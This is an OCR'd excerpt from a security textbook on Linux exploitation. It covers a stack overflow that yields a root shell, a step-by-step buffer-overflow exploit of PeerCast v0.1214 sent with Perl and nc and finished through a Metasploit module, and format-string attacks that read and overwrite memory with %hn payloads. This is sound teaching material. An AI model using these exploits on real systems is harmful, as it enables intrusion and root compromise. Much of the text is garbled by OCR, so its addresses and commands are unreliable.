$ ,/exploit2 

[***] using address: 0xbfffffc2 

sh-2.05b# whoami 

root 

sh-2.05b# exit 

exit 

$exit 

Why did this work? It turns out that a Turkish hacker named Murat Balaban pub- 
lished this technique, which relies on the fact that all Linux ELF fdes are mapped into 
memory with the last relative address as Oxbfffffff. Remember from Chapter 10 that the 
environment and arguments are stored up in this area. Just below them is the stack. 
Let's look at the upper process memory in detail: 



High End of Process Memory 

Oxbffffffa 



1 


r 


◄ 

Stack 


Args/Env 


Shellcode 


Prog 

Name 


4 Null 
Bytes 


i 


k Ai 



Low Mem: Address of Shellcode High Mem: 

Oxllllllll Oxbfffffff 

Notice how the end of memory is terminated with null values, and then comes the 
program name, then the environment variables, and finally the arguments. The follow- 
ing line of code from exploit2.c sets the value of the environment for the process as the 
shellcode: 

char *env[] = { shellcode, NULL }; 

That places the beginning of the shellcode at the precise location: 

Addr of shellcode=0xbf f f f f fa-length (program name) -length (shellcode) . 

Let's verify that with gdb. First, to assist with the debugging, place a \xcc at the 
beginning of the shellcode to halt the debugger when the shellcode is executed. Next, 
recompile the program and load it into the debugger: 
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# gcc -o exploit2 exploit2.c # after adding \xcc before shellcode 

# gdb exploit2 --quiet 

(no debugging symbols found) . . . (gdb) 

(gdb) run 

Starting program: /root/book/exploit2 
[***] using address: 0xbfffffc2 

(no debugging symbols found) . . . (no debugging symbols found) . . . 

Program received signal SIGTRAP, Trace/breakpoint trap. 

0x40000b00 in _start () from /lib/ld-linux. so . 2 

(gdb) x/20s 0xbfffffc2 /*this was output from exploit2 above */ 

Oxbf f f f f c2 : 

"e\037^\2 llv\blA\2 10F\a\2 1 lF\f ° \v\2 1 16\2 15N\b\2 15V\f f \2001U\2 1 100 I\200eUyyy 
bin/sh" 

OxbffffffO: " . /smallbuf f " 

Oxbffffffc: 

Oxbffffffd: 

Oxbffffffe: 

Oxbfffffff: 

OxcOOOOOOO: <Address OxcOOOOOOO out of bounds> 

OxcOOOOOOO: <Address OxcOOOOOOO out of bounds> 

References 

Buffer Overflow Exploits Tutorial mixter.void.ru/exploit.html 

Buffer Overflows Demystified (Murat Balaban) www.endemnix.org/docs/eng/ 

bof-eng.txt 

Hacking: The Art of Exploitation, Second Edition (Jon Erickson) No Starch Press, 2008 
"Smashing the Stack for Fun and Profit" (Aleph One) www.phrack.com/issues 
.html?issue=49&id=14#article 

"Vulnerabilities in Your Code - Advanced Buffer Overflows" (CoreSecurity) 
packetstormsecurity.nl/papers/general/core_vulnerabilities.pdf 

Exploit Development Process 

Now that we have covered the basics, you are ready to look at a real-world example. In 
the real world, vulnerabilities are not always as straightforward as the meet.c example 
and require a repeatable process to successfully exploit. The exploit development pro- 
cess generally follows these steps: 

• Control eip 

• Determine the offset(s) 

• Determine the attack vector 

• Build the exploit sandwich 

• Test the exploit 

• Debug the exploit if needed 

At first, you should follow these steps exactly; later, you may combine a couple of 
these steps as required. 
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Control eip 

In this real-world example, we are going to look at the PeerCast v0.1214 server from 
http://peercast.org. This server is widely used to serve up radio stations on the Internet. 
There are several vulnerabilities in this application. We will focus on the 2006 advisory 
www.infigo.hr/in_focus/INFIGO-2006-03-01, which describes a buffer overflow in the 
vO. 1214 URL string. It turns out that if you attach a debugger to the server and send the 
server a URL that looks like this: 

http : //localhost : 7 144 / stream/ 7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA. . . . (800) 

your debugger should break as follows: 

gdb output... 

[Switching to Thread 180236 (LWP 4526) ] 

0x41414141 in ?? () 

(gdb) i r eip 

eip 0x41414141 0x41414141 

(gdb) 

As you can see, we have a classic buffer overflow and have total control of eip. Now 
that we have accomplished the first step of the exploit development process, let's move 
to the next step. 

Determine the Offset(s) 

With control of eip, we need to find out exactly how many characters it took to cleanly 
overwrite eip (and nothing more). The easiest way to do this is with Metasploit's pat- 
tern tools. 

First, let's start the PeerCast vO. 121 4 server and attach our debugger with the follow- 
ing commands: 

#. /peercast & 

[1] 10794 

#netstat -pan I grep 7144 

tcp 0 0 0.0.0. : 7 1 4 4 0.0. 0.0:* LISTEN 10794/peercast 

As you can see, the process ID (PID) in our case was 10794; yours will be different. Now 
we can attach to the process with gdb and tell gdb to follow all child processes: 

#gdb -q 

(gdb) set follow-fork-mode child 
(gdb) attach 10794 
Output omitted for brevity 
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|[1] 107*1 
Itcp 0 



./peercast & 

netstat pan |grep 7144 
0 0.0.0.0:7144 

0 



107*f/peerca$t 






Shell No. 7 - Konsoto 



igclb) set follow- fork-iode child 
Igdb) attach 107*f 
Attaching to process 107*1 

Reading syibols froi /ant/live/ieaory/changes/root/peercast/peercast. . 
Using host libthread_db library ‘/lib/tls/libthread_db.so.r. 

Reading syibols froi’/usr/lib/lib$tdo*.so.5. . .done, 
oadcd syibols for /usr/lib/libstdc*'t.so.5 
[Reading syibols froi /lib/tls/libi.so.6. . .done. 

Jed syibols for /lib/tls/libi so.6 
[Reading syibols froi /usr/lib/libgcc_s so 1 done 
Loaded syibols for /usr/lib/libgcc_s.so.l 
Reading syibols froi /lib/tls/libpthread.so.O. . .done. 

1 Thread debugging using libthread db enabled) 

INew Thread 121178787? (LWP 107*11] 

(New Thread -123W5G&28 (LWP 10798)1 
(New Thread -1228067920 (W» 10797)] 

(New Thread 1219679312 ILWP 10796)] 

(New Thread -1211290/04 (LWP 107%)] 

[loaded syibols for /lib/tls/libpthread.so.O 

Reading syibols froi /lib/tls/libc.so 6 done 

Loaded syibols for /lib/tls/libc.so. 6 

Reading syibols froi /lib/ld- linux so. 2 done 

Loadpd syibols for /lib/ld linux. so. 2 

0xb7d611dc in _nanosleep_nocan<el 0 froi /lib/tls/libc.so. 6 

(gdb) c 

Continuing. 



done. 




Next, we can use Metasploit to create a large pattern of characters and feed it to the 
PeerCast server using the following perl command from within a Metasploit Frame- 
work Cygwin shell. For this example, we chose to use a Windows attack system running 
Metasploit 2.6. 

~/ framework/ lib 

$ perl -e 'use Pex; print Pex :: Text :: PatternCreate ( 1010 ) ' 



-/framcwork/lib Hll 

aflen®IBp T ' 8^^ bI 

$ perl -e 'use Pex; print Pex: : Text: :PatternCreate( 1010)' 

Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0AblAb2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0AclAc2Ac3Ac4Ac5Ac| 
6Ac7Ac8Ac9Ad0AdlAd2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0AelAe2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af lAf 2A| 

$1 

0Aml 

n3An4An5An6An7An8An9Ao0AolAo2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0AplAp2Ap3Ap4Ap5Ap6Ap7Ap8Ap9B 
Aq0AqlAq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0ArlAr2Ar3Ar4Ar5Ar6Ar7Ar8Ar9A50A5lA52As3A54A55A5H 
6As7As8As9At0At lAt2At3At4At5At6At7At8At9Au0AulAu2Au3Au4Au5Au6Au7Au8Au9Av0AvlAv2AB 
v3Av4Av5Av6Av7Av8Av9Aw0Ai»lAiu2Aw3Aw4Aw5Aw6Aw7Aw8A«i9Ax0AxlAx2Ax3Ax4Ax5Ax6Ax7Ax8AxSH 
Ay0Ay lAy2Ay3Ay4Ay^y6Ay7Ay8Ay9Az0AzlAz2Az3Az4Az5Az6Az7Az8Az9Ba0BalBa2Ba3Ba4Ba5BaM 
6Ba7Ba86a98b0BblBb2Bb3Bb4Bb56b6Bb7Bb8Bb98c0BclBc2Bc3Bc4Bc5Bc68c7Bc8Bc9Bd03dlBd2Bl 
d38d4Bd5Bd68d7Bd8Bd9Be03e lBe2Be3Be4Be5Be6Be7Be8Be9Bf 0Bf lBf 2Bf 3Bf 4Bf 5Bf 6Bf 7Bf 8Bf fl 
Bg0Bg lBg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh !Bh2Bh3Bh4Bh5Bh | 



8Ag9Ah0AhlAh2Ah3Ah4Ah5Ah6Ah7Ah8Ah9B 

j5Ai6Ai7A.8Ai9Ak0AklAk2Ak3Ak4Ak5Akl 

.il -- -t. ” t!: .’■> ■ ... . z U 



f 3Af 4Af 5Af 6Af 7Af 8Af 9Ag0AglAg2Ag3Ag4Ag5Ag6A 
Ai0Ai lAi2Ai3Ai4Ai5Ai6Ai7Ai8Ai9A j0A i 1A j2A J3 
6Ak7Ak8Ak9A10AllA12A13A14A15A16A17A18A19Am 
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On your Windows attack system, open Notepad and save a file called peercast.sh in 
the program files/metasploit framework/home/framework/ directory. 

Paste in the preceding pattern you created and the following wrapper commands, 
like this: 

perl -e 'print "GET /stream/ ?Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0AblAb2Ab3Ab4Ab5 

Ab6Ab7Ab8Ab9Ac0AclAc2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0AdlAd2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae 

lAe2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af OAf lAf 2Af 3Af 4Af 5Af 6Af 7Af 8Af 9Ag0AglAg2Ag3Ag4Ag5Ag6A 

g7Ag8Ag9Ah0AhlAh2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0AilAi2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj lAj2 

Aj 3Aj 4Aj 5Aj 6Aj 7Aj 8Aj 9Ak0AklAk2Ak3Ak4Ak5Ak6Ak7Ak8Ak9A10AllA12A13A14A15A16A17Al 

8A19Am0AmlAm2Am3Am4Am5Am6Am7Am8Am9An0AnlAn2An3An4An5An6An7An8An9Ao0AolAo2Ao3A 

o4Ao5Ao6Ao7Ao8Ao9Ap0AplAp2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0AqlAq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9 

ArOArlAr2Ar3Ar4Ar5Ar 6Ar7Ar8Ar 9AsOAslAs2As3As4As5As 6As7As8As 9 At 0 At 1 At 2 At 3 At 4 At 

5At6At7At8At9Au0AulAu2Au3Au4Au5Au6Au7Au8Au9Av0AvlAv2Av3Av4Av5Av6Av7Av8Av9Aw0A 

wlAw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0AxlAx2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0AylAy2Ay3Ay4Ay5Ay6 

Ay7Ay8Ay9Az0AzlAz2Az3Az4Az5Az6Az7Az8Az9Ba0BalBa2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0BblBb 

2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0BclBc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0BdlBd2Bd3Bd4Bd5Bd6Bd7B 

d8Bd9Be0BelBe2Be3Be4Be5Be6Be7Be8Be9Bf OBf lBf 2Bf 3Bf 4Bf 5Bf 6Bf 7Bf 8Bf 9BgOBglBg2Bg3 

Bg4Bg5Bg6Bg7Bg8Bg9Bh0BhlBh2Bh3Bh4Bh5Bh\ 

r\n" ; ' | nc 10.10.10.151 7144 



Be sure to remove all hard carriage returns from the ends of each line. Make the 
peercast.sh file executable, within your Metasploit Cygwin shell: 



$ chmod 755 ../peercast.sh 



Execute the peercast.sh attack script: 



$ . . /peercast . sh 



As expected, when we run the attack script, our server crashes: 



using nost untnrea<i_aD uorary */iio/tts/uotnrea<j_<it>.so .1'. 
Reading symbols froa /usr/lib/libstdo*.so.5. . .done. 

Loaded symbols for /usr/lib/Ubstdc-** so. 5 
Reading symbols fro* /lib/tls/liba so 6 done 
Loaded symbols for /Ub/tls/liba. so. 6 
Reading vyabols froa /u*r/lib/libgcc_s.*o.l. . .done. 

Loaded symbols for /usr/lib/libgcc^s.so.l 
Reading symbols f roe /lib/tls/libpthread.so.O. . .done 
(Thread debugging using libtbread db enabled) 

(Hew Thread 1211287872 <LW> 107941] 

(Hew Thread -1236456528 <LXP 107981) 
iHew Thread -1228067920 <LWP 10797)] 

I New Thread -1219679312 <L*P 10796)] 

(New Thread 1211290704 (LHP 10795)1 
Loaded syabols for /lib/tlt/libpthread.so.O 
Reading symbols froa /lib/tls/libc so. 6 . .done. 

Loaded syabols for /lib/tls/libc.so.6 
Reading syabols froa /lib/ld-linux.so.2 . .done. 

Loaded syabols for /lib/ld-linux.so.2 

Oxb7d611dc in nanosleep_nocancel () froa /lib/tls/libc ,so.6 



Program received signal SIGSEGV, Segmentation fault. 

(Switching to Thread -1244&45136 (LWP 11251)] 

0x42306142 in ?? 0 

(gdb) x/lx Jesp 

0xb5ccc840: 0x61423161 

(gdb) | 



Continuing. 

(Hew Thread 1244845136 (IMP 11251 

Program received signal SIGSEGV, S 
(Switching to Thread 1244845136 (I 
0x42306142 in 77 O 
l gdb) x/lx tesp 
Gxb5ccc840: 0x61423161 

I gdb > | 




The debugger breaks with eip set to 0x42306142 and esp set to 0x61423161. Using 
Metasploit' s patternOffset.pl tool, we can determine where in the pattern we overwrote 
eip and esp: 
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_llen8>IBM-4B5E8287D50 ~Zf rameworkZl lb 

$ cd . . Zsdk 

a 1 1 en®I BM-4B5E8287D50 ~/f ra«ie»ork/s dk 

t . ZpatternOffset.pl 0x42306142 1010 ' 
780 

al len@IBM-4B5E8287D50 ~Zf rameuiork/sdk 

i .ZpatternOffset.pl 0x61423161 1010 • 
784 

al len®IBM-4B5E8287D50 ~Zf rameuiorkZsdk 



EIP Place “jmp esp” Here 
ESP Place Shellcode Here 



Determine the Attack Vector 

As can be seen in the last step, when the program crashed, the overwritten esp value 
was exactly 4 bytes after the overwritten eip. Therefore, if we fill the attack buffer with 
780 bytes of junk and then place 4 bytes to overwrite eip, we can then place our shell- 
code at this point and have access to it in esp when the program crashes, because the 
value of esp matches the value of our buffer at exactly 4 bytes after eip (784). Each ex- 
ploit is different, but in this case, all we have to do is find an assembly opcode that says 
"jmp esp." If we place the address of that opcode after 780 bytes of junk, the program 
will continue executing that opcode when it crashes. At that point, our shellcode will 
be jumped into and executed. This staging and execution technique will serve as our 
attack vector for this exploit. 



Buffer 


EBP 


EIP 


Arguments 


780 Bytes of Junk 


Return 


Shellcode at 784 



““ 1 

Use “jmp esp” OPCODE 



To find the location of such an opcode in an ELF (Linux) file, you may use Meta- 



msfelfscan tool: 


BT framework 


-2.6 n ./msfelfscan 


Usage: /msfelfscan 


< inputs <mnde> <npt.inns> 


Inputs- 


f 


<f ilc> 


Read in ELF file 


llodes: 


-J 


<reg> 


Search for jump equiualent Instructions 


-s 




Search for pop*pop*ret combinations 


-X 


<regex> 


Search for regex natch 


-a 


<address> 


Show code at specified uirtual address 


(lpt ions : 


-A 


<count> 


Number of bytes to show after natch 


B 


<count> 


Number of bytes to show before natch 


-I 


address 


Specify an alternate base luad address 


-n 




Print disassembly of matched data 


BT framework 


-2.6 It ./msfelfscan -f '/peercast -j esp 


0x0808fc2f 


.jmp esp 




0x0808 ff 9? 


jmp esp 




0xQ8G900e7 


>P esp 




0x08090 le? 


j«P esp 




0x0009037 f 


jmp esp 




0x080906 If 


jmp esp 




0x0809G9df 


jmp esp 




BT framework 


-2.6 It 





As you can see, the "jmp esp" opcode exists in several locations in the file. You can- 
not use an opcode that contains a "00" byte, which rules out the third one. For no 
particular reason, we will use the second one: 0x0808ff97. 
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Build the Exploit Sandwich 

We could build our exploit sandwich from scratch, but it is worth noting that Meta- 
sploit has a module for PeerCast v0.1212. All we need to do is modify the module to 
add our newly found opcode (0x0808ff97) for PeerCast v0.1214 and set the default 
target to that new value: 



NOTE This opcode attack vector is not subject to stack randomization and 
is therefore a useful technique around that kernel defense. 



^ exploits 


1 Ele Gd* iflew Favor* ei 


loot* 


O -if 


} Seerch | folders 




Felders * 


Fisne - 






i tJ ktetssfto* Framework 


, _*)peercast_di_rw»32.pm 






* 


_i) pfp.wordoressjastpost.pm 


6 Ohome 


j)p*p_»w*pc_evalpm 


* L3 ,mrf 




S ^ framework 


*) t*vr»A«_s*«rch_modJ*.pm 


* 


Tjpoptopjiegativejeed.pin 


□ docs 


r)pUty.ssti.pm 


(J ereoders 


_*) rMb«rver_dw<r*)e_lru)< {■» 


LJ exptats 


j»)realvnc.4l .byjsess.pm 





*lrv» iswetMoer* redrect.om 




Test the Exploit 

Restart the Metasploit console and load the new PeerCast module to test it: 
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Woot! It worked! After setting some basic options and exploiting, we gained root, 
dumped "id," and then proceeded to show the top of the /etc/password file. 

References 

Metasploit Conference Materials (Rapid7) www.metasploit.com/research/ 
conferences 

Metasploit Unleashed online course (David Kennedy et al.) 

www.offensive-security.com/metasploit-unleashed/ 
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CHAPTER 



Advanced Linux Exploits 



Now that you have the basics under your belt from reading Chapter 11, you are ready 
to study more advanced Linux exploits. The field is advancing constantly, and there are 
always new techniques discovered by the hackers and countermeasures implemented 
by developers. No matter which side you approach the problem from, you need to 
move beyond the basics. That said, we can only go so far in this book; your journey is 
only beginning. The "References" sections will give you more destinations to explore. 

In this chapter, we cover the following types of advanced Linux exploits: 

• Format string exploits 

• Memory protection schemes 

Format String Exploits 

Format string exploits became public in late 2000. Unlike buffer overflows, format string 
errors are relatively easy to spot in source code and binary analysis. Once spotted, they 
are usually eradicated quickly. Because they are more likely to be found by automated 
processes, as discussed in later chapters, format string errors appear to be on the decline. 
That said, it is still good to have a basic understanding of them because you never know 
what will be found tomorrow. Perhaps you might find a new format string error! 

The Problem 

Format strings are found in format functions. In other words, the function may behave 
in many ways depending on the format string provided. Following are some of the 
many format functions that exist (see the "References" section for a more complete 
list): 

• printfQ Prints output to standard input/output handle (STDIO-usually the 
screen) 

• fprintf() Prints output to a file stream 

• sprintf() Prints output to a string 

• snprintfQ Prints output to a string with length checking built in 
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Format Strings 

As you may recall from Chapter 10, the printf() function may have any number of argu- 
ments. We will discuss two forms here: 

printf (<format string>, Clist of variables/values>) ; 
printf (Cuser supplied string>) ; 



The first form is the most secure way to use the printf() function because the pro- 
grammer explicitly specifies how the function is to behave by using a format string (a 
series of characters and special format tokens). 

Table 12-1 introduces two more format tokens, %hn and <number>$, that may be 
used in a format string (the four originally listed in Table 10-4 are included for your 
convenience). 

The Correct Way 

Recall the correct way to use the printf() function. For example, the following code: 

//fmtl . c 
main() { 

printf ("This is a %s.\n", "test"); 

} 

produces the following output: 

$gcc -o fmtl fmtl.c 
$ . /fmtl 

This is a test. 

The Incorrect Way 

Now take a look at what happens if we forget to add a value for the %s to replace: 

// fmt2.c 
main() { 

printf ("This is a %s.\n"); 

} 

$ gcc -o fmt2 fmt2.c 
$ . /fmt2 

This is a fyi . 



Format Symbol 


Meaning 


Example 


\n 


Carriage return/new line 


printf(“test\n”); 


%d 


Decimal value 


printf(“test %d”, 123); 


%s 


String value 


printf(“test %s”,“l23”); 


%x 


Hex value 


printf(“test %x”, Ox 1 23); 


%hn 


Print the length of the current 
string in bytes to var (short int 
value, overwrites 1 6 bits) 


printf(“test %hn”, var); 

Results: the value 04 is stored in var 
(that is, 2 bytes) 


<number>$ 


Direct parameter access 


printf(“test %2$s”, “ 1 2”, “ 1 23”); 
Results: test 123 (second parameter 
is used directly) 
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What was that? Looks like Greek, but actually, it's machine language (binary), 
shown in ASCII. In any event, it is probably not what you were expecting. To make mat- 
ters worse, consider what happens if the second form of printfQ is used like this: 



// fmt3 . c 

main(int argc, char * argv[]){ 
printf (argv [ 1 ] ) ; 

} 



If the user runs the program like this, all is well: 

$gcc -o fmt3 fmt3 . c 
$./fmt3 Testing 
Testing# 

The cursor is at the end of the line because we did not use a \n carriage return as 
before. But what if the user supplies a format string as input to the program? 

$gcc -o fmt3 fmt3.c 
$./fmt3 Testing%s 
TestingYyy ' iy# 



Wow, it appears that we have the same problem. However, it turns out this latter 
case is much more deadly because it may lead to total system compromise. To find out 
what happened here, we need to learn how the stack operates with format functions. 

Stack Operations with Format Functions 

To illustrate the function of the stack with format functions, we will use the following 
program: 



// fmt4 . c 
main ( ) { 

int one=l, two=2, three=3; 

printf ("Testing %d, %d, %d!\n", one, two, three) ; 

} 

$gcc -o fmt4.c 
. / fmt4 

Testing 1, 2, 3! 

During execution of the printf() function, the stack looks like Figure 12-1. 

As always, the parameters of the printf() function are pushed on the stack in reverse 
order, as shown in Figure 12-1. The addresses of the parameter variables are used. The 



Internal Pointer 
of printfQ 



Stack Grows 





Return 


Addr of 


Addr of 


Addr of 


Addr of 






Addr 


fmt str 


var: one 


var: two 


var: three 





Top of Stack Bottom of Stack 

Lower Memory Higher Memory 



Figure 1 2-1 Depiction of the stack when printfQ is executed 
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printf() function maintains an internal pointer that starts out pointing to the format 
string (or top of the stack frame) and then begins to print characters of the format string 
to the STDIO handle (the screen in this case) until it comes upon a special character. 

If the % is encountered, the printf() function expects a format token to follow and 
thus increments an internal pointer (toward the bottom of the stack frame) to grab 
input for the format token (either a variable or absolute value). Therein lies the prob- 
lem: the printf() function has no way of knowing if the correct number of variables or 
values were placed on the stack for it to operate. If the programmer is sloppy and does 
not supply the correct number of arguments, or if the user is allowed to present their 
own format string, the function will happily move down the stack (higher in memory), 
grabbing the next value to satisfy the format string requirements. So what we saw in our 
previous examples was the printf() function grabbing the next value on the stack and 
returning it where the format token required. 




NOTE The \ is handled by the compiler and used to escape the next 
character after the VThis is a way to present special characters to a program 
and not have them interpreted literally. However, if a \x is encountered, then 
the compiler expects a number to follow and converts that number to its hex 
equivalent before processing. 



Implications 

The implications of this problem are profound indeed. In the best case, the stack value 
may contain a random hex number that may be interpreted as an out-of-bounds ad- 
dress by the format string, causing the process to have a segmentation fault. This could 
possibly lead to a denial-of-service condition to an attacker. 

In the worst case, however, a careful and skillful attacker may be able to use this 
fault to both read arbitrary data and write data to arbitrary addresses. In fact, if the 
attacker can overwrite the correct location in memory, the attacker may be able to gain 
root privileges. 



Example Vulnerable Program 

For the remainder of this section, we will use the following piece of vulnerable code to 
demonstrate the possibilities: 

//fmtstr . c 

#include <stdlib.h> 

int main(int argc, char *argv[]){ 

static int canary=0; // stores the canary value in .data section 
char temp[2048]; // string to hold large temp string 

strcpyftemp, argv[l]); // take argvl input and jam into temp 
printf (temp) ; // print value of temp 

printf ("\n") ; // print carriage return 

printf ("Canary at 0x%08x = 0x%08x\n", &canary, canary); //print canary 

} 

#gcc -o fmtstr fmtstr. c 
#. /fmtstr Testing 
Testing 

Canary at 0x08049440 = 0x00000000 
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#chmod u+s fmtstr 
tsu joeuser 
$ 




NOTE The “Canary” value is just a placeholder for now. It is important to 
realize that your value will certainly be different. For that matter, your system 
may produce different values for all the examples in this chapter; however, the 
results should be the same. 



Reading from Arbitrary Memory 

We will now begin to take advantage of the vulnerable program. We will start slowly 
and then pick up speed. Buckle up, here we go! 

Using the %x Token to Map Out the Stack 

As shown in Table 12-1, the %x format token is used to provide a hex value. So, by sup- 
plying a few %08x tokens to our vulnerable program, we should be able to dump the 
stack values to the screen: 

$ ./fmtstr "AAAA %08x %08x %08x %08x" 

AAAA bf f f fd2d 00000648 00000774 41414141 
Canary at 0x08049440 = 0x00000000 
$ 

The 08 is used to define precision of the hex value (in this case, 8 bytes wide). No- 
tice that the format string itself was stored on the stack, proven by the presence of our 
AAAA (0x41414141) test string. The fact that the fourth item shown (from the stack) 
was our format string depends on the nature of the format function used and the loca- 
tion of the vulnerable call in the vulnerable program. To find this value, simply use 
brute force and keep increasing the number of %08x tokens until the beginning of the 
format string is found. For our simple example (fmtstr), the distance, called the offset, 
is defined as 4. 

Using the %s Token to Read Arbitrary Strings 

Because we control the format string, we can place anything in it we like (well, almost 
anything). For example, if we wanted to read the value of the address located in the 
fourth parameter, we could simply replace the fourth format token with a %s, as 
shown: 

$ ./fmtstr "AAAA %08x %08x %08x %s" 

Segmentation fault 
$ 



Why did we get a segmentation fault? Because, as you recall, the %s format token 
will take the next parameter on the stack, in this case the fourth one, and treat it like a 
memory address to read from (by reference). In our case, the fourth value is AAAA, 
which is translated in hex to 0x41414141, which (as we saw in the previous chapter) 
causes a segmentation fault. 
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Reading Arbitrary Memory 

So how do we read from arbitrary memory locations? Simple: we supply valid address- 
es within the segment of the current process. We will use the following helper program 
to assist us in finding a valid address: 

$ cat getenv.c 

#include <stdlib.h> 

int main(int argc, char *argv[]){ 

char * addr; //simple string to hold our input in bss section 
addr = getenv (argv [ 1 ] ) ; //initialize the addr var with input 
printf("%s is located at %p\n", argv[l], addr ); //display location 

} 

$ gcc -o getenv getenv.c 



The purpose of this program is to fetch the location of environment variables from 
the system. To test this program, let's check for the location of the SHELL variable, 
which stores the location of the current user's shell: 

$ ./getenv SHELL 

SHELL is located at 0xbffffd84 

Now that we have a valid memory address, let's try it. First, remember to reverse the 
memory location because this system is little-endian: 

$ ./fmtstr 'printf "\x84\xfd\xff \xbf " ' " %08x %08x %08x %s" 
yyi bf f f fd2f 00000648 00000774 /bin/bash 
Canary at 0x08049440 = 0x00000000 

Success! We were able to read up to the first NULL character of the address given 
(the SHELL environment variable). Take a moment to play with this now and check out 
other environment variables. To dump all environment variables for your current ses- 
sion, type env | more at the shell prompt. 

Simplifying the Process with Direct Parameter Access 

To make things even easier, you may even access the fourth parameter from the stack by 
what is called direct parameter access. The #$ format token is used to direct the format 
function to jump over a number of parameters and select one directly. For example: 

$cat dirpar.c 
//dirpar . c 
main ( ) { 

printf ("This is a %3$s.\n", 1, 2, "test"); 

} 

$gcc -o dirpar dirpar.c 

$ . /dirpar 

This is a test. 

$ 
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Now when you use the direct parameter format token from the command line, you 
need to escape the $ with a \ in order to keep the shell from interpreting it. Let's put this 
all to use and reprint the location of the SHELL environment variable: 

$ ./fmtstr 'printf "\x84\xfd\xff \xbf " ' "%4\$s" 
yyi/bin/bash 

Canary at 0x08049440 = 0x00000000 

Notice how short the format string can be now. 




CAUTION The preceding format works for bash. Other shells such as tcsh 
require other formats; for example: 

$ ./fmtstr 'printf "\x84\xfd\xff \xbf" ' ' %4\$s ' 

Notice the use of a single quote on the end. To make the rest of the chapter’s 
examples easy, use the bash shell. 



Writing to Arbitrary Memory 

For this example, we will try to overwrite the canary address 0x08049440 with the 
address of shellcode (which we will store in memory for later use). We will use this 
address because it is visible to us each time we run fmtstr, but later we will see how 
we can overwrite nearly any address. 



Magic Formula 

As shown by Blaess, Grenier, and Raynal (see "References"), the easiest way to write 
4 bytes in memory is to split it up into two chunks (two high-order bytes and two low- 
order bytes) and then use the #$ and %hn tokens to put the two values in the right 
place. 

For example, let's put our shellcode from the previous chapter into an environment 
variable and retrieve the location: 

$ export SC='cat sc' 

$ ./getenv SC 

SC is located at 0xbfffff50 ! ! ! ! ! ! yours will be different! ! ! ! ! ! 

If we wish to write this value into memory, we would split it into two values: 

• Two high-order bytes (HOB): Oxbfff 

• Two low-order bytes (LOB): 0xff50 

As you can see, in our case, HOB is less than (<) LOB, so follow the first column in 
Table 12-2. 

Now comes the magic. Table 12-2 presents the formula to help you construct the 
format string used to overwrite an arbitrary address (in our case, the canary address, 
0x08049440). 
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When HOB < LOB 


When LOB < HOB 


Notes 


In This Case 


[addr + 2][addr] 


[addr + 2][addr] 


Notice second 
1 6 bits go first. 


\x42\x94\x04\x08\ x40\ 
x94\x04\x08 


%.[HOB - 8]x 


%.[LOB - 8]x 


used to 

ensure integers. 
Expressed in 
decimal. 


Oxbfff - 8 = 49 1 43 in 
decimal, so %.49 1 43x 


%[offset]$hn 


% [offset + l]$hn 




%4\$hn 


%.[LOB - HOB]x 


%.[HOB - LOB]x 


used to 

ensure integers. 
Expressed in 
decimal. 


0xff50 - Oxbfff = 16209 in 
decimal, so %. 1 6209x 


%[offset+ l]$hn 


%[offset]$hn 




%5\$hn 



Table 12-2 The Magic Formula to Calculate Your Exploit Format String 



Using the Canary Value to Practice 

Using Table 12-2 to construct the format string, let's try to overwrite the canary value 
with the location of our shellcode. 




CAUTION At this point, you must understand that the names of our programs 
(getenv and fmtstr) need to be the same length. This is because the program 
name is stored on the stack on startup, and therefore the two programs will 
have different environments (and locations of the shellcode in this case) if their 
names are of different lengths. If you named your programs something different, 
you will need to play around and account for the difference or simply rename 
them to the same size for these examples to work. 



To construct the injection buffer to overwrite the canary address 0x08049440 with 
0xbfffff50, follow the formula in Table 12-2. Values are calculated for you in the right 
column and used here: 



$ ./fmtstr 'printf 

"\x42\x94\x04\x08\x40\x94\x04\x08" ' % . 4 9143x%4 \$hn% . 16209x%5\$hn 
000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000 
0000000000000000000000000 
<truncated> 

000000000000000000000000000000000000000000000000000000000000000000000000000 

000000000000000000648 

Canary at 0x08049440 = 0xbfffff50 




CAUTION Once again, your values will be different. Start with the getenv 
program, and then use Table 1 2-2 to get your own values. Also, there is actually 
no new line between the printf and the double quote. 
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Taking .dtors to root 

Okay, so what? We can overwrite a staged canary value. . .big deal. It is a big deal because 
some locations are executable and, if overwritten, may lead to system redirection and 
execution of your shellcode. We will look at one of many such locations, called .dtors. 



ELF32 File Format 

When the GNU compiler creates binaries, they are stored in ELF32 file format. This 
format allows for many tables to be attached to the binary. Among other things, these 
tables are used to store pointers to functions the file may need often. There are two 
tools you may find useful when dealing with binary files: 



• nm Used to dump the addresses of the sections of the ELF32 format file 

• objdump Used to dump and examine the individual sections of the file 

Let's start with the nm tool: 

$ nm ,/fmtstr |more 
08049448 D _DYNAMIC 
08049524 D _GLOBAL_OFFSET_TABLE_ 

08048410 R 10 stdin used 



w 

08049514 d 
08049510 d 
0804951c d 
08049518 d 
08049444 d 
08049444 d 
08049520 d 
08049520 d 
08049540 A 
08049434 D 
080483c8 t 
080482f4 t 
08049438 d 



